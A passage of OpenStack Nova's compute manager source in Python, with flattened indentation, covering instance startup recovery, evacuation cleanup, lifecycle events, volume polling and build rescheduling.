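# how a virt driver typically consumes wait_for_instance_event() while
# plugging VIFs. The ('network-vif-plugged', vif_id) names follow the
# convention used for neutron external events; the helper itself is
# hypothetical.
def _example_wait_for_vif_plug(virtapi, instance, vif_ids):
    events = [('network-vif-plugged', vif_id) for vif_id in vif_ids]
    try:
        with virtapi.wait_for_instance_event(instance, events, deadline=300):
            # Start the operation that causes neutron to emit the events,
            # e.g. actually plugging the VIFs and powering on the guest.
            pass
    except eventlet.timeout.Timeout:
        LOG.warning(_LW('Timed out waiting for network-vif-plugged events'),
                    instance=instance)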
class ComputeManager(manager.Manager):
"""Manages the running instances from creation to destruction."""
target = messaging.Target(version='3.40')
# How long to wait in seconds before re-issuing a shutdown
# signal to a instance during power off. The overall
# time to wait is set by CONF.shutdown_timeout.
SHUTDOWN_RETRY_INTERVAL = 10
def __init__(self, compute_driver=None, *args, **kwargs):
"""Load configuration options and connect to the hypervisor."""
self.virtapi = ComputeVirtAPI(self)
self.network_api = network.API()
self.volume_api = volume.API()
self.image_api = image.API()
self._last_host_check = 0
self._last_bw_usage_poll = 0
self._bw_usage_supported = True
self._last_bw_usage_cell_update = 0
self.compute_api = compute.API()
self.compute_rpcapi = compute_rpcapi.ComputeAPI()
self.conductor_api = conductor.API()
self.compute_task_api = conductor.ComputeTaskAPI()
self.is_neutron_security_groups = (
openstack_driver.is_neutron_security_groups())
self.consoleauth_rpcapi = consoleauth.rpcapi.ConsoleAuthAPI()
self.cells_rpcapi = cells_rpcapi.CellsAPI()
self.scheduler_rpcapi = scheduler_rpcapi.SchedulerAPI()
self.scheduler_client = scheduler_client.SchedulerClient()
self._resource_tracker_dict = {}
self.instance_events = InstanceEvents()
self._sync_power_pool = eventlet.GreenPool()
self._syncs_in_progress = {}
self.send_instance_updates = CONF.scheduler_tracks_instance_changes
if CONF.max_concurrent_builds != 0:
self._build_semaphore = eventlet.semaphore.Semaphore(
CONF.max_concurrent_builds)
else:
self._build_semaphore = compute_utils.UnlimitedSemaphore()
super(ComputeManager, self).__init__(service_name="compute",
*args, **kwargs)
self.additional_endpoints.append(_ComputeV4Proxy(self))
# NOTE(russellb) Load the driver last. It may call back into the
# compute manager via the virtapi, so we want it to be fully
# initialized before that happens.
self.driver = driver.load_compute_driver(self.virtapi, compute_driver)
self.use_legacy_block_device_info = \
self.driver.need_legacy_block_device_info
def _get_resource_tracker(self, nodename):
rt = self._resource_tracker_dict.get(nodename)
if not rt:
if not self.driver.node_is_available(nodename):
raise exception.NovaException(
_("%s is not a valid node managed by this "
"compute host.") % nodename)
rt = resource_tracker.ResourceTracker(self.host,
self.driver,
nodename)
self._resource_tracker_dict[nodename] = rt
return rt
def _update_resource_tracker(self, context, instance):
"""Let the resource tracker know that an instance has changed state."""
if (instance['host'] == self.host and
self.driver.node_is_available(instance['node'])):
rt = self._get_resource_tracker(instance.get('node'))
rt.update_usage(context, instance)
def _instance_update(self, context, instance_uuid, **kwargs):
"""Update an instance in the database using kwargs as value."""
instance_ref = self.conductor_api.instance_update(context,
instance_uuid,
**kwargs)
self._update_resource_tracker(context, instance_ref)
return instance_ref
def _set_instance_error_state(self, context, instance):
instance_uuid = instance.uuid
try:
self._instance_update(context, instance_uuid,
vm_state=vm_states.ERROR)
except exception.InstanceNotFound:
LOG.debug('Instance has been destroyed from under us while '
'trying to set it to ERROR',
instance_uuid=instance_uuid)
def _set_instance_obj_error_state(self, context, instance):
try:
instance.vm_state = vm_states.ERROR
instance.save()
except exception.InstanceNotFound:
LOG.debug('Instance has been destroyed from under us while '
'trying to set it to ERROR', instance=instance)
def _get_instances_on_driver(self, context, filters=None):
"""Return a list of instance records for the instances found
on the hypervisor which satisfy the specified filters. If filters=None
return a list of instance records for all the instances found on the
hypervisor.
"""
if not filters:
filters = {}
try:
driver_uuids = self.driver.list_instance_uuids()
if len(driver_uuids) == 0:
# Short circuit, don't waste a DB call
return objects.InstanceList()
filters['uuid'] = driver_uuids
local_instances = objects.InstanceList.get_by_filters(
context, filters, use_slave=True)
return local_instances
except NotImplementedError:
pass
# The driver doesn't support uuids listing, so we'll have
# to brute force.
driver_instances = self.driver.list_instances()
instances = objects.InstanceList.get_by_filters(context, filters,
use_slave=True)
name_map = {instance.name: instance for instance in instances}
local_instances = []
for driver_instance in driver_instances:
instance = name_map.get(driver_instance)
if not instance:
continue
local_instances.append(instance)
return local_instances
def _destroy_evacuated_instances(self, context):
"""Destroys evacuated instances.
While nova-compute was down, the instances running on it could be
evacuated to another host. Check that the instances reported
by the driver are still associated with this host. If they are
not, destroy them, with the exception of instances which are in
the MIGRATING, RESIZE_MIGRATING, RESIZE_MIGRATED, RESIZE_FINISH
task state or RESIZED vm state.
"""
our_host = self.host
filters = {'deleted': False}
local_instances = self._get_instances_on_driver(context, filters)
for instance in local_instances:
if instance.host != our_host:
if (instance.task_state in [task_states.MIGRATING,
task_states.RESIZE_MIGRATING,
task_states.RESIZE_MIGRATED,
task_states.RESIZE_FINISH]
or instance.vm_state in [vm_states.RESIZED]):
LOG.debug('Will not delete instance as its host ('
'%(instance_host)s) is not equal to our '
'host (%(our_host)s) but its task state is '
'(%(task_state)s) and vm state is '
'(%(vm_state)s)',
{'instance_host': instance.host,
'our_host': our_host,
'task_state': instance.task_state,
'vm_state': instance.vm_state},
instance=instance)
continue
if not CONF.workarounds.destroy_after_evacuate:
LOG.warning(_LW('Instance %(uuid)s appears to have been '
'evacuated from this host to %(host)s. '
'Not destroying it locally due to '
'config setting '
'"workarounds.destroy_after_evacuate". '
'If this is not correct, enable that '
'option and restart nova-compute.'),
{'uuid': instance.uuid,
'host': instance.host})
continue
LOG.info(_LI('Deleting instance as its host ('
'%(instance_host)s) is not equal to our '
'host (%(our_host)s).'),
{'instance_host': instance.host,
'our_host': our_host}, instance=instance)
try:
network_info = self._get_instance_nw_info(context,
instance)
bdi = self._get_instance_block_device_info(context,
instance)
destroy_disks = not (self._is_instance_storage_shared(
context, instance))
except exception.InstanceNotFound:
network_info = network_model.NetworkInfo()
bdi = {}
LOG.info(_LI('Instance has been marked deleted already, '
'removing it from the hypervisor.'),
instance=instance)
# always destroy disks if the instance was deleted
destroy_disks = True
self.driver.destroy(context, instance,
network_info,
bdi, destroy_disks)
def _is_instance_storage_shared(self, context, instance, host=None):
shared_storage = True
data = None
try:
data = self.driver.check_instance_shared_storage_local(context,
instance)
if data:
shared_storage = (self.compute_rpcapi.
check_instance_shared_storage(context,
instance, data, host=host))
except NotImplementedError:
LOG.warning(_LW('Hypervisor driver does not support '
'instance shared storage check, '
'assuming it\'s not on shared storage'),
instance=instance)
shared_storage = False
except Exception:
LOG.exception(_LE('Failed to check if instance shared'),
instance=instance)
finally:
if data:
self.driver.check_instance_shared_storage_cleanup(context,
data)
return shared_storage
def _complete_partial_deletion(self, context, instance):
"""Complete deletion for instances in DELETED status but not marked as
deleted in the DB
"""
system_meta = instance.system_metadata
instance.destroy()
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance.uuid)
quotas = objects.Quotas(context=context)
project_id, user_id = objects.quotas.ids_from_instance(context,
instance)
quotas.reserve(project_id=project_id, user_id=user_id, instances=-1,
cores=-instance.vcpus, ram=-instance.memory_mb)
self._complete_deletion(context,
instance,
bdms,
quotas,
system_meta)
def _complete_deletion(self, context, instance, bdms,
quotas, system_meta):
if quotas:
quotas.commit()
# ensure block device mappings are not leaked
for bdm in bdms:
bdm.destroy()
self._notify_about_instance_usage(context, instance, "delete.end",
system_metadata=system_meta)
if CONF.vnc_enabled or CONF.spice.enabled:
if CONF.cells.enable:
self.cells_rpcapi.consoleauth_delete_tokens(context,
instance.uuid)
else:
self.consoleauth_rpcapi.delete_tokens_for_instance(context,
instance.uuid)
self._delete_scheduler_instance_info(context, instance.uuid)
def _create_reservations(self, context, instance, project_id, user_id):
vcpus = instance.vcpus
mem_mb = instance.memory_mb
quotas = objects.Quotas(context=context)
quotas.reserve(project_id=project_id,
user_id=user_id,
instances=-1,
cores=-vcpus,
ram=-mem_mb)
return quotas
def _init_instance(self, context, instance):
'''Initialize this instance during service init.'''
# NOTE(danms): If the instance appears to not be owned by this
# host, it may have been evacuated away, but skipped by the
# evacuation cleanup code due to configuration. Thus, if that
# is a possibility, don't touch the instance in any way, but
# log the concern. This will help avoid potential issues on
# startup due to misconfiguration.
if instance.host != self.host:
LOG.warning(_LW('Instance %(uuid)s appears to not be owned '
'by this host, but by %(host)s. Startup '
'processing is being skipped.'),
{'uuid': instance.uuid,
'host': instance.host})
return
# Instances that are shut down, or in an error state can not be
# initialized and are not attempted to be recovered. The exception
# to this are instances that are in RESIZE_MIGRATING or DELETING,
# which are dealt with further down.
if (instance.vm_state == vm_states.SOFT_DELETED or
(instance.vm_state == vm_states.ERROR and
instance.task_state not in
(task_states.RESIZE_MIGRATING, task_states.DELETING))):
LOG.debug("Instance is in %s state.",
instance.vm_state, instance=instance)
return
if instance.vm_state == vm_states.DELETED:
try:
self._complete_partial_deletion(context, instance)
except Exception:
                # we don't want an exception to block the init_host
msg = _LE('Failed to complete a deletion')
LOG.exception(msg, instance=instance)
return
if (instance.vm_state == vm_states.BUILDING or
instance.task_state in [task_states.SCHEDULING,
task_states.BLOCK_DEVICE_MAPPING,
task_states.NETWORKING,
task_states.SPAWNING]):
# NOTE(dave-mcnally) compute stopped before instance was fully
# spawned so set to ERROR state. This is safe to do as the state
            # may be set by the api but the host is not, so if we get here the
# instance has already been scheduled to this particular host.
LOG.debug("Instance failed to spawn correctly, "
"setting to ERROR state", instance=instance)
instance.task_state = None
instance.vm_state = vm_states.ERROR
instance.save()
return
if (instance.vm_state in [vm_states.ACTIVE, vm_states.STOPPED] and
instance.task_state in [task_states.REBUILDING,
task_states.REBUILD_BLOCK_DEVICE_MAPPING,
task_states.REBUILD_SPAWNING]):
# NOTE(jichenjc) compute stopped before instance was fully
            # spawned so set to ERROR state. This is consistent with BUILD
LOG.debug("Instance failed to rebuild correctly, "
"setting to ERROR state", instance=instance)
instance.task_state = None
instance.vm_state = vm_states.ERROR
instance.save()
return
if (instance.vm_state != vm_states.ERROR and
instance.task_state in [task_states.IMAGE_SNAPSHOT_PENDING,
task_states.IMAGE_PENDING_UPLOAD,
task_states.IMAGE_UPLOADING,
task_states.IMAGE_SNAPSHOT]):
LOG.debug("Instance in transitional state %s at start-up "
"clearing task state",
instance.task_state, instance=instance)
try:
self._post_interrupted_snapshot_cleanup(context, instance)
except Exception:
                # we don't want an exception to block the init_host
msg = _LE('Failed to cleanup snapshot.')
LOG.exception(msg, instance=instance)
instance.task_state = None
instance.save()
if (instance.vm_state != vm_states.ERROR and
instance.task_state in [task_states.RESIZE_PREP]):
LOG.debug("Instance in transitional state %s at start-up "
"clearing task state",
instance['task_state'], instance=instance)
instance.task_state = None
instance.save()
if instance.task_state == task_states.DELETING:
try:
LOG.info(_LI('Service started deleting the instance during '
'the previous run, but did not finish. Restarting'
' the deletion now.'), instance=instance)
instance.obj_load_attr('metadata')
instance.obj_load_attr('system_metadata')
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance.uuid)
project_id, user_id = objects.quotas.ids_from_instance(
context, instance)
quotas = self._create_reservations(context, instance,
project_id, user_id)
self._delete_instance(context, instance, bdms, quotas)
except Exception:
                # we don't want an exception to block the init_host
msg = _LE('Failed to complete a deletion')
LOG.exception(msg, instance=instance)
self._set_instance_error_state(context, instance)
return
try_reboot, reboot_type = self._retry_reboot(context, instance)
current_power_state = self._get_power_state(context, instance)
if try_reboot:
LOG.debug("Instance in transitional state (%(task_state)s) at "
"start-up and power state is (%(power_state)s), "
"triggering reboot",
{'task_state': instance.task_state,
'power_state': current_power_state},
instance=instance)
self.compute_rpcapi.reboot_instance(context, instance,
block_device_info=None,
reboot_type=reboot_type)
return
elif (current_power_state == power_state.RUNNING and
instance.task_state in [task_states.REBOOT_STARTED,
task_states.REBOOT_STARTED_HARD,
task_states.PAUSING,
task_states.UNPAUSING]):
LOG.warning(_LW("Instance in transitional state "
"(%(task_state)s) at start-up and power state "
"is (%(power_state)s), clearing task state"),
{'task_state': instance.task_state,
'power_state': current_power_state},
instance=instance)
instance.task_state = None
instance.vm_state = vm_states.ACTIVE
instance.save()
elif (current_power_state == power_state.PAUSED and
instance.task_state == task_states.UNPAUSING):
LOG.warning(_LW("Instance in transitional state "
"(%(task_state)s) at start-up and power state "
"is (%(power_state)s), clearing task state "
"and unpausing the instance"),
{'task_state': instance.task_state,
'power_state': current_power_state},
instance=instance)
try:
self.unpause_instance(context, instance)
except NotImplementedError:
# Some virt driver didn't support pause and unpause
pass
except Exception:
LOG.exception(_LE('Failed to unpause instance'),
instance=instance)
return
if instance.task_state == task_states.POWERING_OFF:
try:
LOG.debug("Instance in transitional state %s at start-up "
"retrying stop request",
instance.task_state, instance=instance)
self.stop_instance(context, instance)
except Exception:
                # we don't want an exception to block the init_host
msg = _LE('Failed to stop instance')
LOG.exception(msg, instance=instance)
return
if instance.task_state == task_states.POWERING_ON:
try:
LOG.debug("Instance in transitional state %s at start-up "
"retrying start request",
instance.task_state, instance=instance)
self.start_instance(context, instance)
except Exception:
                # we don't want an exception to block the init_host
msg = _LE('Failed to start instance')
LOG.exception(msg, instance=instance)
return
net_info = compute_utils.get_nw_info_for_instance(instance)
try:
self.driver.plug_vifs(instance, net_info)
except NotImplementedError as e:
LOG.debug(e, instance=instance)
except exception.VirtualInterfacePlugException:
# we don't want an exception to block the init_host
LOG.exception(_LE("Vifs plug failed"), instance=instance)
self._set_instance_error_state(context, instance)
return
if instance.task_state == task_states.RESIZE_MIGRATING:
# We crashed during resize/migration, so roll back for safety
try:
# NOTE(mriedem): check old_vm_state for STOPPED here, if it's
# not in system_metadata we default to True for backwards
# compatibility
power_on = (instance.system_metadata.get('old_vm_state') !=
vm_states.STOPPED)
block_dev_info = self._get_instance_block_device_info(context,
instance)
self.driver.finish_revert_migration(context,
instance, net_info, block_dev_info, power_on)
except Exception:
LOG.exception(_LE('Failed to revert crashed migration'),
instance=instance)
finally:
LOG.info(_LI('Instance found in migrating state during '
'startup. Resetting task_state'),
instance=instance)
instance.task_state = None
instance.save()
if instance.task_state == task_states.MIGRATING:
# Live migration did not complete, but instance is on this
# host, so reset the state.
instance.task_state = None
instance.save(expected_task_state=[task_states.MIGRATING])
db_state = instance.power_state
drv_state = self._get_power_state(context, instance)
expect_running = (db_state == power_state.RUNNING and
drv_state != db_state)
LOG.debug('Current state is %(drv_state)s, state in DB is '
'%(db_state)s.',
{'drv_state': drv_state, 'db_state': db_state},
instance=instance)
if expect_running and CONF.resume_guests_state_on_host_boot:
LOG.info(_LI('Rebooting instance after nova-compute restart.'),
instance=instance)
block_device_info = \
self._get_instance_block_device_info(context, instance)
try:
self.driver.resume_state_on_host_boot(
context, instance, net_info, block_device_info)
except NotImplementedError:
LOG.warning(_LW('Hypervisor driver does not support '
'resume guests'), instance=instance)
except Exception:
# NOTE(vish): The instance failed to resume, so we set the
# instance to error and attempt to continue.
LOG.warning(_LW('Failed to resume instance'),
instance=instance)
self._set_instance_error_state(context, instance)
elif drv_state == power_state.RUNNING:
# VMwareAPI drivers will raise an exception
try:
self.driver.ensure_filtering_rules_for_instance(
instance, net_info)
except NotImplementedError:
LOG.warning(_LW('Hypervisor driver does not support '
'firewall rules'), instance=instance)
def _retry_reboot(self, context, instance):
current_power_state = self._get_power_state(context, instance)
current_task_state = instance.task_state
retry_reboot = False
reboot_type = compute_utils.get_reboot_type(current_task_state,
current_power_state)
pending_soft = (current_task_state == task_states.REBOOT_PENDING and
instance.vm_state in vm_states.ALLOW_SOFT_REBOOT)
pending_hard = (current_task_state == task_states.REBOOT_PENDING_HARD
and instance.vm_state in vm_states.ALLOW_HARD_REBOOT)
started_not_running = (current_task_state in
[task_states.REBOOT_STARTED,
task_states.REBOOT_STARTED_HARD] and
current_power_state != power_state.RUNNING)
if pending_soft or pending_hard or started_not_running:
retry_reboot = True
return retry_reboot, reboot_type
def handle_lifecycle_event(self, event):
LOG.info(_LI("VM %(state)s (Lifecycle Event)"),
{'state': event.get_name()},
instance_uuid=event.get_instance_uuid())
context = nova.context.get_admin_context(read_deleted='yes')
instance = objects.Instance.get_by_uuid(context,
event.get_instance_uuid(),
expected_attrs=[])
vm_power_state = None
if event.get_transition() == virtevent.EVENT_LIFECYCLE_STOPPED:
vm_power_state = power_state.SHUTDOWN
elif event.get_transition() == virtevent.EVENT_LIFECYCLE_STARTED:
vm_power_state = power_state.RUNNING
elif event.get_transition() == virtevent.EVENT_LIFECYCLE_PAUSED:
vm_power_state = power_state.PAUSED
elif event.get_transition() == virtevent.EVENT_LIFECYCLE_RESUMED:
vm_power_state = power_state.RUNNING
else:
LOG.warning(_LW("Unexpected power state %d"),
event.get_transition())
if vm_power_state is not None:
LOG.debug('Synchronizing instance power state after lifecycle '
'event "%(event)s"; current vm_state: %(vm_state)s, '
'current task_state: %(task_state)s, current DB '
'power_state: %(db_power_state)s, VM power_state: '
'%(vm_power_state)s',
dict(event=event.get_name(),
vm_state=instance.vm_state,
task_state=instance.task_state,
db_power_state=instance.power_state,
vm_power_state=vm_power_state),
instance_uuid=instance.uuid)
self._sync_instance_power_state(context,
instance,
vm_power_state)
def handle_events(self, event):
if isinstance(event, virtevent.LifecycleEvent):
try:
self.handle_lifecycle_event(event)
except exception.InstanceNotFound:
LOG.debug("Event %s arrived for non-existent instance. The "
"instance was probably deleted.", event)
else:
LOG.debug("Ignoring event %s", event)
def init_virt_events(self):
self.driver.register_event_listener(self.handle_events)
def init_host(self):
"""Initialization for a standalone compute service."""
self.driver.init_host(host=self.host)
context = nova.context.get_admin_context()
instances = objects.InstanceList.get_by_host(
context, self.host, expected_attrs=['info_cache', 'metadata'])
if CONF.defer_iptables_apply:
self.driver.filter_defer_apply_on()
self.init_virt_events()
try:
# checking that instance was not already evacuated to other host
self._destroy_evacuated_instances(context)
for instance in instances:
self._init_instance(context, instance)
finally:
if CONF.defer_iptables_apply:
self.driver.filter_defer_apply_off()
self._update_scheduler_instance_info(context, instances)
def cleanup_host(self):
self.driver.register_event_listener(None)
self.instance_events.cancel_all_events()
self.driver.cleanup_host(host=self.host)
def pre_start_hook(self):
"""After the service is initialized, but before we fully bring
the service up by listening on RPC queues, make sure to update
our available resources (and indirectly our available nodes).
"""
self.update_available_resource(nova.context.get_admin_context())
def _get_power_state(self, context, instance):
"""Retrieve the power state for the given instance."""
LOG.debug('Checking state', instance=instance)
try:
return self.driver.get_info(instance).state
except exception.InstanceNotFound:
return power_state.NOSTATE
def get_console_topic(self, context):
"""Retrieves the console host for a project on this host.
Currently this is just set in the flags for each compute host.
"""
# TODO(mdragon): perhaps make this variable by console_type?
return '%s.%s' % (CONF.console_topic, CONF.console_host)
@wrap_exception()
def get_console_pool_info(self, context, console_type):
return self.driver.get_console_pool_info(console_type)
@wrap_exception()
def refresh_security_group_rules(self, context, security_group_id):
"""Tell the virtualization driver to refresh security group rules.
Passes straight through to the virtualization driver.
"""
return self.driver.refresh_security_group_rules(security_group_id)
@wrap_exception()
def refresh_security_group_members(self, context, security_group_id):
"""Tell the virtualization driver to refresh security group members.
Passes straight through to the virtualization driver.
"""
return self.driver.refresh_security_group_members(security_group_id)
@object_compat
@wrap_exception()
def refresh_instance_security_rules(self, context, instance):
"""Tell the virtualization driver to refresh security rules for
an instance.
Passes straight through to the virtualization driver.
Synchronise the call because we may still be in the middle of
creating the instance.
"""
@utils.synchronized(instance.uuid)
def _sync_refresh():
try:
return self.driver.refresh_instance_security_rules(instance)
except NotImplementedError:
LOG.warning(_LW('Hypervisor driver does not support '
'security groups.'), instance=instance)
return _sync_refresh()
@wrap_exception()
def refresh_provider_fw_rules(self, context):
"""This call passes straight through to the virtualization driver."""
return self.driver.refresh_provider_fw_rules()
def _get_instance_nw_info(self, context, instance):
"""Get a list of dictionaries of network data of an instance."""
return self.network_api.get_instance_nw_info(context, instance)
def _await_block_device_map_created(self, context, vol_id):
# TODO(yamahata): creating volume simultaneously
# reduces creation time?
# TODO(yamahata): eliminate dumb polling
start = time.time()
retries = CONF.block_device_allocate_retries
if retries < 0:
LOG.warning(_LW("Treating negative config value (%(retries)s) for "
"'block_device_retries' as 0."),
{'retries': retries})
# (1) treat negative config value as 0
# (2) the configured value is 0, one attempt should be made
        # (3) the configured value is > 0, then the total number of attempts
# is (retries + 1)
attempts = 1
if retries >= 1:
attempts = retries + 1
for attempt in range(1, attempts + 1):
volume = self.volume_api.get(context, vol_id)
volume_status = volume['status']
if volume_status not in ['creating', 'downloading']:
if volume_status == 'available':
return attempt
LOG.warning(_LW("Volume id: %(vol_id)s finished being "
"created but its status is %(vol_status)s."),
{'vol_id': vol_id,
'vol_status': volume_status})
break
greenthread.sleep(CONF.block_device_allocate_retries_interval)
raise exception.VolumeNotCreated(volume_id=vol_id,
seconds=int(time.time() - start),
attempts=attempt,
volume_status=volume_status)
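    # Illustrative example (editor's addition): with the defaults of
    # block_device_allocate_retries=60 and
    # block_device_allocate_retries_interval=3, the loop above polls the
    # volume up to 61 times (roughly three minutes) before raising
    # VolumeNotCreated.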
def _decode_files(self, injected_files):
"""Base64 decode the list of files to inject."""
if not injected_files:
return []
def _decode(f):
path, contents = f
try:
decoded = base64.b64decode(contents)
return path, decoded
except TypeError:
raise exception.Base64Exception(path=path)
return [_decode(f) for f in injected_files]
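    # Illustrative example (editor's addition): the API hands injected files
    # to the manager as (path, base64_contents) pairs, e.g.
    #
    #     [('/etc/motd', base64.b64encode('Welcome\n'))]
    #
    # and _decode_files() returns [('/etc/motd', 'Welcome\n')], raising
    # Base64Exception for contents that cannot be decoded.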
def _run_instance(self, context, request_spec,
filter_properties, requested_networks, injected_files,
admin_password, is_first_time, node, instance,
legacy_bdm_in_spec):
"""Launch a new instance with specified options."""
extra_usage_info = {}
def notify(status, msg="", fault=None, **kwargs):
"""Send a create.{start,error,end} notification."""
type_ = "create.%(status)s" % dict(status=status)
info = extra_usage_info.copy()
info['message'] = msg
self._notify_about_instance_usage(context, instance, type_,
extra_usage_info=info, fault=fault, **kwargs)
try:
self._prebuild_instance(context, instance)
if request_spec and request_spec.get('image'):
image_meta = request_spec['image']
else:
image_meta = {}
extra_usage_info = {"image_name": image_meta.get('name', '')}
notify("start") # notify that build is starting
instance, network_info = self._build_instance(context,
request_spec, filter_properties, requested_networks,
injected_files, admin_password, is_first_time, node,
instance, image_meta, legacy_bdm_in_spec)
notify("end", msg=_("Success"), network_info=network_info)
except exception.RescheduledException as e:
# Instance build encountered an error, and has been rescheduled.
notify("error", fault=e)
except exception.BuildAbortException as e:
# Instance build aborted due to a non-failure
LOG.info(e)
notify("end", msg=e.format_message()) # notify that build is done
except Exception as e:
# Instance build encountered a non-recoverable error:
with excutils.save_and_reraise_exception():
self._set_instance_error_state(context, instance)
notify("error", fault=e) # notify that build failed
def _prebuild_instance(self, context, instance):
self._check_instance_exists(context, instance)
try:
self._start_building(context, instance)
except (exception.InstanceNotFound,
exception.UnexpectedDeletingTaskStateError):
msg = _("Instance disappeared before we could start it")
# Quickly bail out of here
raise exception.BuildAbortException(instance_uuid=instance.uuid,
reason=msg)
def _validate_instance_group_policy(self, context, instance,
filter_properties):
# NOTE(russellb) Instance group policy is enforced by the scheduler.
# However, there is a race condition with the enforcement of
# anti-affinity. Since more than one instance may be scheduled at the
# same time, it's possible that more than one instance with an
# anti-affinity policy may end up here. This is a validation step to
# make sure that starting the instance here doesn't violate the policy.
scheduler_hints = filter_properties.get('scheduler_hints') or {}
group_hint = scheduler_hints.get('group')
if not group_hint:
return
@utils.synchronized(group_hint)
def _do_validation(context, instance, group_hint):
group = objects.InstanceGroup.get_by_hint(context, group_hint)
if 'anti-affinity' not in group.policies:
return
group_hosts = group.get_hosts(exclude=[instance.uuid])
if self.host in group_hosts:
msg = _("Anti-affinity instance group policy was violated.")
raise exception.RescheduledException(
instance_uuid=instance.uuid,
reason=msg)
_do_validation(context, instance, group_hint)
def _build_instance(self, context, request_spec, filter_properties,
requested_networks, injected_files, admin_password, is_first_time,
node, instance, image_meta, legacy_bdm_in_spec):
original_context = context
context = context.elevated()
# NOTE(danms): This method is deprecated, but could be called,
# and if it is, it will have an old megatuple for requested_networks.
if requested_networks is not None:
requested_networks_obj = objects.NetworkRequestList(
objects=[objects.NetworkRequest.from_tuple(t)
for t in requested_networks])
else:
requested_networks_obj = None
# If neutron security groups pass requested security
# groups to allocate_for_instance()
if request_spec and self.is_neutron_security_groups:
security_groups = request_spec.get('security_group')
else:
security_groups = []
if node is None:
node = self.driver.get_available_nodes(refresh=True)[0]
LOG.debug("No node specified, defaulting to %s", node)
network_info = None
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance.uuid)
# b64 decode the files to inject:
injected_files_orig = injected_files
injected_files = self._decode_files(injected_files)
rt = self._get_resource_tracker(node)
try:
limits = filter_properties.get('limits', {})
with rt.instance_claim(context, instance, limits):
# NOTE(russellb) It's important that this validation be done
# *after* the resource tracker instance claim, as that is where
# the host is set on the instance.
self._validate_instance_group_policy(context, instance,
filter_properties)
macs = self.driver.macs_for_instance(instance)
dhcp_options = self.driver.dhcp_options_for_instance(instance)
network_info = self._allocate_network(original_context,
instance, requested_networks_obj, macs,
security_groups, dhcp_options)
# Verify that all the BDMs have a device_name set and assign a
# default to the ones missing it with the help of the driver.
self._default_block_device_names(context, instance, image_meta,
bdms)
instance.vm_state = vm_states.BUILDING
instance.task_state = task_states.BLOCK_DEVICE_MAPPING
instance.save()
block_device_info = self._prep_block_device(
context, instance, bdms)
set_access_ip = (is_first_time and
not instance.access_ip_v4 and
not instance.access_ip_v6)
instance = self._spawn(context, instance, image_meta,
network_info, block_device_info,
injected_files, admin_password,
set_access_ip=set_access_ip)
except (exception.InstanceNotFound,
exception.UnexpectedDeletingTaskStateError):
# the instance got deleted during the spawn
# Make sure the async call finishes
if network_info is not None:
network_info.wait(do_raise=False)
try:
self._deallocate_network(context, instance)
except Exception:
msg = _LE('Failed to dealloc network '
'for deleted instance')
LOG.exception(msg, instance=instance)
raise exception.BuildAbortException(
instance_uuid=instance.uuid,
reason=_("Instance disappeared during build"))
except (exception.UnexpectedTaskStateError,
exception.VirtualInterfaceCreateException) as e:
# Don't try to reschedule, just log and reraise.
with excutils.save_and_reraise_exception():
LOG.debug(e.format_message(), instance=instance)
# Make sure the async call finishes
if network_info is not None:
network_info.wait(do_raise=False)
except exception.InvalidBDM:
with excutils.save_and_reraise_exception():
if network_info is not None:
network_info.wait(do_raise=False)
try:
self._deallocate_network(context, instance)
except Exception:
msg = _LE('Failed to dealloc network '
'for failed instance')
LOG.exception(msg, instance=instance)
except Exception:
exc_info = sys.exc_info()
# try to re-schedule instance:
# Make sure the async call finishes
if network_info is not None:
network_info.wait(do_raise=False)
rescheduled = self._reschedule_or_error(original_context, instance,
exc_info, requested_networks, admin_password,
injected_files_orig, is_first_time, request_spec,
filter_properties, bdms, legacy_bdm_in_spec)
if rescheduled:
# log the original build error
self._log_original_error(exc_info, instance.uuid)
raise exception.RescheduledException(
instance_uuid=instance.uuid,
reason=six.text_type(exc_info[1]))
else:
# not re-scheduling, go to error:
raise exc_info[0], exc_info[1], exc_info[2]
# spawn success
return instance, network_info
def _log_original_error(self, exc_info, instance_uuid):
LOG.error(_LE('Error: %s'), exc_info[1], instance_uuid=instance_uuid,
exc_info=exc_info)
def _reschedule_or_error(self, context, instance, exc_info,
requested_networks, admin_password, injected_files, is_first_time,
request_spec, filter_properties, bdms=None,
legacy_bdm_in_spec=True):
"""Try to re-schedule the build or re-raise the original build error to
error out the instance.
"""
original_context = context
context = context.elevated()
instance_uuid = instance.uuid
rescheduled = False
compute_utils.add_instance_fault_from_exc(context,
instance, exc_info[1], exc_info=exc_info)
self._notify_about_instance_usage(context, instance,
'instance.create.error', fault=exc_info[1])
try:
LOG.debug("Clean up resource before rescheduling.",
instance=instance)
if bdms is None:
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance.uuid)
self._shutdown_instance(context, instance,
bdms, requested_networks)
self._cleanup_volumes(context, instance.uuid, bdms)
except Exception:
# do not attempt retry if clean up failed:
with excutils.save_and_reraise_exception():
self._log_original_error(exc_info, instance_uuid)
try:
method_args = (request_spec, admin_password, injected_files,
requested_networks, is_first_time, filter_properties,
legacy_bdm_in_spec)
task_state = task_states.SCHEDULING
rescheduled = self._reschedule(original_context, request_spec,
filter_properties, instance,
self.scheduler_rpcapi.run_instance, method_args,
task_state, exc_info)
except Exception:
rescheduled = False
LOG.exception(_LE("Error trying to reschedule"),
instance_uuid=instance_uuid)
return rescheduled
def _reschedule(self, context, request_spec, filter_properties,
instance, reschedule_method, method_args, task_state,
exc_info=None):
"""Attempt to re-schedule a compute operation."""
instance_uuid = instance.uuid
retry = filter_properties.get('retry', None)
if not retry:
# no retry information, do not reschedule.
LOG.debug("Retry info not present, will not reschedule",
instance_uuid=instance_uuid)
return
if not request_spec:
LOG.debug("No request spec, will not reschedule",
instance_uuid=instance_uuid)
return
LOG.debug("Re-scheduling %(method)s: attempt %(num)d",
{'method': reschedule_method.func_name,
'num': retry['num_attempts']}, instance_uuid=instance_uuid)
# reset the task state:
self._instance_update(context, instance_uuid, task_state=task_state)
if exc_info:
# stringify to avoid circular ref problem in json serialization:
retry['exc'] = traceback.format_exception_only(exc_info[0],
exc_info[1])
reschedule_method(context, *method_args)
return True
@periodic_task.periodic_task
def _check_instance_build_time(self, context):
"""Ensure that instances are not stuck in build."""
timeout = CONF.instance_build_timeout
if timeout == 0:
return
filters = {'vm_state': vm_states.BUILDING,
'host': self.host}
building_insts = objects.InstanceList.get_by_filters(context,
filters, expected_attrs=[], use_slave=True)
for instance in building_insts:
if timeutils.is_older_than(instance.created_at, timeout):
self._set_instance_error_state(context, instance)
